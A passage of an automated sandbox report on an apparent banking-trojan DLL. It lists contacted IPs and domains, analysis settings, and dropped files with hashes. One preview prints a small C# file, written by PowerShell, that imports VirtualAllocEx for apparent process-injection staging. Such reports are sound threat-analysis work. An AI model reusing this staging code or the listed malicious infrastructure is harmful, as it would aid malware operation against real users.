https://contoso.com/Icon | powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | false | - | high

                                                          Contacted IPs


                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
40.97.156.114 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.178.98 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
193.29.104.83 | xereunrtol.website | Romania | 9009 | M247GB | false
52.97.151.18 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.97.160.2 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
40.101.9.178 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
52.98.208.114 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:499264
                                                          Start date:08.10.2021
                                                          Start time:06:42:36
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 15m 41s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:uT9rwkGATJ.dll
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:48
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.bank.troj.evad.winDLL@54/38@14/8
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 41.9% (good quality ratio 40.3%)
                                                          • Quality average: 79.7%
                                                          • Quality standard deviation: 27.9%
                                                          HCA Information:
                                                          • Successful, ratio: 94%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .dll
                                                          • Override analysis time to 240s for rundll32
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.56, 2.20.178.10, 20.199.120.182, 20.199.120.151, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.199.120.85, 20.50.102.62
                                                          • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
06:45:09 | API Interceptor | 7x Sleep call for process: rundll32.exe modified
06:45:14 | API Interceptor | 6x Sleep call for process: loaddll32.exe modified
06:46:19 | API Interceptor | 121x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

Match: outlook.com

Associated Sample Name / URL | Detection | Context
vhPaw5lCuv.exe | malicious | 40.93.212.0
5sTWnI5RoC.exe | malicious | 40.93.207.0
57wF9hu0V5.exe | malicious | 40.93.207.0
7zxmUw3Ml1.exe | malicious | 104.47.53.36
Nh1UI4PFGW.exe | malicious | 52.101.24.0
rEYF2xcbGR.exe | malicious | 40.93.207.1
G2Shy4flZe.exe | malicious | 40.93.207.1
2nqVnWlyLp.exe | malicious | 52.101.24.0
nFkQ33d7Ec.exe | malicious | 104.47.53.36
QE66HWdeTM.exe | malicious | 40.93.207.0
2H69p1kjC4.exe | malicious | 40.93.207.1
SEYpTxOaaR.exe | malicious | 104.47.53.36
fxXx5zeMoZ.exe | malicious | 104.47.53.36
CcXHF1vwBV.exe | malicious | 40.93.207.1
dBqfgL7GXS.exe | malicious | 52.101.24.0
5noOquwN1Y.exe | malicious | 40.93.212.0
4n7IhmzVJs.exe | malicious | 52.101.24.0
rhmBIBtY1G.exe | malicious | 52.101.24.0
pKnzTBUS7B.exe | malicious | 40.93.207.0
37ZvWVwdgn.exe | malicious | 104.47.53.36

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.883977562702998
                                                          Encrypted:false
                                                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.9260988789684415
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulb/lj:NllUb/l
                                                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: @...e................................................@..........
                                                          C:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0940225424877514
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZuak7Ynqq6vPN5Dlq5J:+RI+ycuZhNjuakS6vPNnqX
                                                          MD5:5E54597013E64C33C8BFB30E0F312D5B
                                                          SHA1:A15A7BB374BA4B520E406DF2C5E9E4A888707FC4
                                                          SHA-256:3765016012262EEAFE2A1A9D362FAC604A8CAC6D816C4AFA039B8F5510175461
                                                          SHA-512:A469B1BE8D588B224433E04D067CC740BE971F293FC1B0A74C2C9F511602C6409B63476BB94B98314265093309CA5F3AB7127E6AA4EF3CD8798E96F61E86A083
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.087002864921187
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryagCM/qak7YnqqvgCM/bPN5Dlq5J:+RI+ycuZhN8HM/qakSvHM/bPNnqX
                                                          MD5:0715FC9E2573623F149A5EE75C23C19B
                                                          SHA1:2CB92F2B64924BB21D69453A6017780D1F016230
                                                          SHA-256:996161F8FFE0C987715BFBA1A7CB32C4B36800CE92A97CC24BF1797720D827AA
                                                          SHA-512:09F78A6A99B359A78FC673E12A2FED9C99D1CE7ACC0FCE909FC98A5F578153ABB29BA9510BF20DD20C6B6EB3BE011CE17C9CCE2662A91C7B7C057697906B4696
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.088300623958703
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygYfGak7YnqqhYfXPN5Dlq5J:+RI+ycuZhNuY+akShYfPNnqX
                                                          MD5:45ACEB27BF09B9A372DF76C41EA25CBC
                                                          SHA1:A5F6283D5F24B18AF5F4206A57A442688BCFA221
                                                          SHA-256:BB5D61468F93620A5CA74F3CAD2B6B935CFB41E627AC05505BF5BFD18DDD23EC
                                                          SHA-512:5EE60D2C82347F5761DACE5C8B13919D8D18F57539C2D42C211D91E21AE5F95CB586D22E94C2978CE83C41970714800F68B6E12019A0B6B4D6B4075838F9DBF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1159679552735917
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyak7YnqqgPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
                                                          MD5:B6F8FAC514A8F5183DB815BD950B9D1F
                                                          SHA1:9C5CEE4507522F07CB4BDE73F8DA9AF0418573F7
                                                          SHA-256:3D4151340E53DE7F388B865E8A54A8D9574D29C30C776ED7A345E691A60C6838
                                                          SHA-512:E50EE4A00FB61B00D3A7EA58F550CAB0BCC6066B38781974586B485DB1FB940A468B3FA2A59503AAD90FC863884E9BB1524CDDCDC9CCB657A972109CCC0690DD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\RES9EC1.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6912424772889194
                                                          Encrypted:false
                                                          SSDEEP:24:43bTkhHNFhKdNNI+ycuZhNjuakS6vPNnq9hgpUnW9s:43ngdKd31uljua36tq9Z5
                                                          MD5:B38B49F3A10F7649430F13A4283FAE5F
                                                          SHA1:3EE4FB0BAD3FB1643752BAF1C6B1A425DFBC8EE8
                                                          SHA-256:1F1E88E61F746EAF0AF0B432B619ACE9F1AE1991A74D8D0675C946B005AD98EE
                                                          SHA-512:4580B5BCB69EC48797925D171C6EE8106C7722F837280D010F6DBFD34193FDB8E2BF3140AC74E06A7E3795FDD146CDD20A81094EC9EC6798A624CD4A45F75DF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........J....c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP.................^TYp..L3....1-[..........4.......C:\Users\user\AppData\Local\Temp\RES9EC1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESB12F.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6914814281046717
                                                          Encrypted:false
                                                          SSDEEP:24:43LghHEhKdNNI+ycuZhN8HM/qakSvHM/bPNnq9hgpGnW9s:43L82Kd31uleMia3vMJq9j5
                                                          MD5:DC6B839F34BBA6D3CB05082BB9F87D49
                                                          SHA1:26A506559EFEE4F82ECF9E17ADC9118433F3363D
                                                          SHA-256:1E3CA6ECAA1C7ECC75DEF865367AF0CB1C8C2A3086E14E09EDBE716C6BE9859D
                                                          SHA-512:6D56FDA4A24300A016A039D006EDB39ADEF3DD286D20F4B7DEDBA1D761935A4C843C5D42431C6E0867B5CC5FAA913BE51112712E523910A8B6FBD1A40F02B7ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........J....c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP.....................%sb?..^.\#............4.......C:\Users\user\AppData\Local\Temp\RESB12F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESB287.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.71260515918407
                                                          Encrypted:false
                                                          SSDEEP:24:jAy9ZhHXQhKdNNI+ycuZhNUakSgPNnq9hgpNnW9s:jAIiKd31ulUa34q9i5
                                                          MD5:10BE416BDF4B44C72317119FC15E943B
                                                          SHA1:219915B9631AE2493E7C87CE7BFFD2B85793D9AB
                                                          SHA-256:FCC50836A5C55FB1A052AA25E56A75AF065A056DBA700F6FE8FD81CFFCE2C6AD
                                                          SHA-512:CD98E69BDB55C2FE5C40FBEB7C6A0003776096463F8762EC93BFE2D5EDAED17B88FEA47DB33CA1F7BCC4B17FC158F73202B911814F0651B50E4501E43B0B4F02
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........K....c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP........................=.................4.......C:\Users\user\AppData\Local\Temp\RESB287.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESC95B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6881321375655713
                                                          Encrypted:false
                                                          SSDEEP:24:jiCvhHEhhKdNNI+ycuZhNuY+akShYfPNnq9hgpRnW9s:jdpkvKd31ult+a3q9q9+5
                                                          MD5:3B53B806CC04C1B8A2A5209336D02D18
                                                          SHA1:E31FF9610D2E472330F330792EC99A5FF8DAA6C6
                                                          SHA-256:0EC24924884C9D3DA340E5F26F6D16876A632A7A27C26EE8F92F52690BB3A377
                                                          SHA-512:9E07B4871C941C90D9758F5D0D987BB543DEA42313AFF23F77D76EE34639ADC74C77095EFC77CC233967297D9301E0967DC6B96548F605121E9FE4FC6682C3A6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........K....c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP................E..'....r.v...\...........4.......C:\Users\user\AppData\Local\Temp\RESC95B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2althh.jtq.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fsqk4c.qy5.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5szhzhvw.zcn.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):405
                                                          Entropy (8bit):4.989686390677173
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
                                                          MD5:5210AC8610DA2A55F963FF2C951D0DC3
                                                          SHA1:A4F391F9661A57D4A40896F31158BB5E445B4269
                                                          SHA-256:53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
                                                          SHA-512:9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yykg. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint qsg,uint ocyun);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.224886261087632
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23flVUzxs7+AEszIWXp+N23flP:p37Lvkmb6KH9qWZE89P
                                                          MD5:704312AA80E7E080EFE947DB843E3C91
                                                          SHA1:1B2258967D5728A67A8171DB6FBB7A33C3D6BD8D
                                                          SHA-256:7B76F9EDD919A4F5F405A47347635685736FECBB35ACF9C08DE86434BBE8C675
                                                          SHA-512:DCA51BA33C8ACD6FEF4E6E7F5D742A19D9E4C7DA42102533E1175A4834780900490A1593BF520FB5CD86069F5C2D8F4A153776471F1BBB0AAD91F201024493F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ebytp2em.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6114615630922198
                                                          Encrypted:false
                                                          SSDEEP:24:etGSz8+mEej8MTHtmCFxcdWptkZf+lBm0hEdI+ycuZhNuY+akShYfPNnq:6xLjMTwCFxuWkJ446Ed1ult+a3q9q
                                                          MD5:0447C5B78E665D1A2761B0469D0D1E62
                                                          SHA1:29EA6B23A4FA3F7132D75162C50A080D1C57E835
